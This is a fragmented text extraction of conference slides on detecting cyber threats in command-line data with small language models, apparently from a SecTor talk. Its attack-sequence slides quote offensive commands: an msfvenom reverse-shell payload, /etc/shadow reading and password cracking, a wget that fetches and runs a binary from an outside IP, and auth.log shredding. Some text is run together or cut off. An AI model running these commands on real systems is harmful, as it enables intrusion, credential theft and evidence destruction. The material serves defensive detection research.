揭露网络威胁：命令行数据与小型语言模型的碰撞.pdf

1、#SECTORCA SecTorCAUnmasking Cyber Threats:Command Line Data Meets Small Language Models#SECTORCA SecTorCAWho We AreLead Data Scientist,Security Analytics,OpenTextPrincipal Data Scientist,Security Analytics,OpenTextDr.Hari KoduvelyMaria Pospelova#SECTORCA SecTorCAAgenda Who we are Target ThreatsAPT A

2、ttack Sequence What are we targeting?Command Line DataWhy it is important?Is it a good data?MethodsBaselineLarge and small language models overview Results and ConclusionsResults overviewConclusions and takeaways#SECTORCA SecTorCATarget Threats#SECTORCA SecTorCAAPT Attack Sequencehttps:/ SecTorCAAPT

3、 Attack Sequencesource:https:/ SecTorCAAPT Attack Sequencemsfvenom-p windows/x64/shell_reverse_tcp LHOST=10.12.34.56 LPORT=443-a x64-platform Windows-f exe-o tftp.exemv C:Custom TasksBackuptftp.exe C:Custom TasksBackuptftp.exe.bak”mv.tftp.exe C:Custom TasksBackupsource:https:/juggernaut- SecTorCAAPT

4、 Attack Sequence ls-la/etc/shadow cat/etc/shadow john-format=sha512crypt-wordlist=/usr/share/wordlists/rockyou.txthash.txt su root whoami;id;pwdsource:https:/ SecTorCAAPT Attack Sequence cat/proc/version uname-a rpm-q kernel dmesg|grep Linux dpkg l ps aux|grep root crontab-l cat/etc/cron*ifconfig ip

5、 link#SECTORCA SecTorCAAPT Attack Sequence psexec-accepteula list_of_ips.txt-s-d-c CSIDL_WINDOWSscrpt.exe#SECTORCA SecTorCAAPT Attack Sequence internal_financial_app.exe -get_report 2024_q2 &wget http:/12.34.56.87/softbox/hydra.exe&./hydra.exe-install#SECTORCA SecTorCAAPT Attack

6、Sequence cd/var/log sudo lsof|grep.log sudo shred zxuvf auth.log vi/.bash_history#SECTORCA SecTorCAWhat are we targeting?Command Line Reconnaissance DetectionCommand Line Anomaly Detection#SECTORCA SecTorCADetection of Internal Reconnaissance Attacks#SECTORCA SecTorCACommand Line Anomaly DetectionNO